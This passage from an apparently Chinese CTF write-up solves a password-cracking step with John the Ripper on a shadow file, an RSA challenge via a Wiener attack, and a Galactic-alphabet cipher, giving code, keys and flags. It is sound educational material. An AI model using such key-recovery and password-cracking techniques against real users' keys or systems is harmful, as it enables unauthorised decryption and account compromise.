completed

ps:如果之前已经执行过上面命令,想再次看结果,可以使用john shadow --show

所以flag{hellokitty}

RSA

1
2
3
4
5
N : 460657813884289609896372056585544172485318117026246263899744329237492701820627219556007788200590119136173895989001382151536006853823326382892363143604314518686388786002989248800814861248595075326277099645338694977097459168530898776007293695728101976069423971696524237755227187061418202849911479124793990722597

e : 354611102441307572056572181827925899198345350228753730931089393275463916544456626894245415096107834465778409532373187125318554614722599301791528916212839368121066035541008808261534500586023652767712271625785204280964688004680328300124849680477105302519377370092578107827116821391826210972320377614967547827619

enc : 38230991316229399651823567590692301060044620412191737764632384680546256228451518238842965221394711848337832459443844446889468362154188214840736744657885858943810177675871991111466653158257191139605699916347308294995664530280816850482740530602254559123759121106338359220242637775919026933563326069449424391192

e比较大,使用维纳攻击获得d,使用rsa-wiener-attack工具求出d,

ps:开始本来想着使用yafu求出p,q,但是分解不出来。

下载链接:https://github.com/pablocelayes/rsa-wiener-attack

修改其中的RSAwienerHacker.py:

1
2
3
4
5
6
7
if __name__ == "__main__":
#test_is_perfect_square()
#print("-------------------------")
n = 460657813884289609896372056585544172485318117026246263899744329237492701820627219556007788200590119136173895989001382151536006853823326382892363143604314518686388786002989248800814861248595075326277099645338694977097459168530898776007293695728101976069423971696524237755227187061418202849911479124793990722597
e = 354611102441307572056572181827925899198345350228753730931089393275463916544456626894245415096107834465778409532373187125318554614722599301791528916212839368121066035541008808261534500586023652767712271625785204280964688004680328300124849680477105302519377370092578107827116821391826210972320377614967547827619
d = hack_RSA(e,n)
print("d=",d)

d = 8264667972294275017293339772371783322168822149471976834221082393409363691895

最后直接用脚本解密即可:

1
2
3
4
5
6
7
8
9
10
11
#coding:utf-8
from libnum import n2s,s2n

n =460657813884289609896372056585544172485318117026246263899744329237492701820627219556007788200590119136173895989001382151536006853823326382892363143604314518686388786002989248800814861248595075326277099645338694977097459168530898776007293695728101976069423971696524237755227187061418202849911479124793990722597

d = 8264667972294275017293339772371783322168822149471976834221082393409363691895

c = 38230991316229399651823567590692301060044620412191737764632384680546256228451518238842965221394711848337832459443844446889468362154188214840736744657885858943810177675871991111466653158257191139605699916347308294995664530280816850482740530602254559123759121106338359220242637775919026933563326069449424391192

m=pow(c,d,n)
print(n2s(m))

得到flag{Wien3r_4tt@ck_1s_3AsY}

来自宇宙的信号

1570685710252

还是积累太少啊。这是标准银河密码

1570685669522

对照得到flag{nopqrst}

-------------本文结束感谢您的阅读-------------
0%